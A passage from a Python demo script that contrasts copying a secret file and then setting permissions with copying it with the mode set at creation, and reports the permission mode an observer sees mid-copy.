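        with tempfile.TemporaryDirectory() as d:
            src, dst = os.path.join(d, "src"), os.path.join(d, "dst")
            with open(src, "wb") as f:
                f.write(SECRET)
            copier(src, dst, 0o600, lambda p: seen.setdefault("mode", _mode(p)))
            assert _mode(dst) == 0o600   # both finish correct; the window differs
    finally:
        os.umask(old_umask)
    return seen["mode"]

if __name__ == "__main__":
    print(f"copy_then_chmod: observer saw 0o{run_demo(copy_then_chmod):o} mid-copy")
    print(f"copy_with_mode:  observer saw 0o{run_demo(copy_with_mode):o} mid-copy")
```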